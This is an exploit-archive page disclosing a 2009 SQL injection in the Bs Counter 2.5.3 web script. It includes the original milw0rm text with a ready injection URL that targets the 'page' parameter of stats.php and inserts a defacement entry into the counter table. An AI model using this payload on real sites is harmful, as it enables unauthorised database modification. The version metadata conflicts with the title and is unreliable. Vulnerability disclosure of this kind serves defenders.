header-logo
Suggest Exploit
vendor:
Bs Counter
by:
Bgh7
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Bs Counter
Affected Version From: 2.5.2003
Affected Version To: 2.5.2003
Patch Exists: NO
Related CWE: N/A
CPE: 2.5.2003
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Bs Counter 2.5.3 (page) Sql Injection Vuln.

An attacker can inject malicious SQL queries into the 'page' parameter of the 'stats.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The malicious code can be used to read, modify or delete data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Bs Counter 2.5.3 (page) Sql Ä°njectÅŸon Vuln.
 
Bgh7
Turk Bilisim Gucleri
Script Downlaod
http://scripti.org/indir.php?id=595
 
Expl0it;
http://www.target.com/file/stats.php?page='insert+into+counter+(countertitle)+values+('HackedByBgh7 tu bi gu')
Bingoo  ! counter name ediT =)

# milw0rm.com [2009-09-14]

Navigation

Suggest Exploit

Services By CQR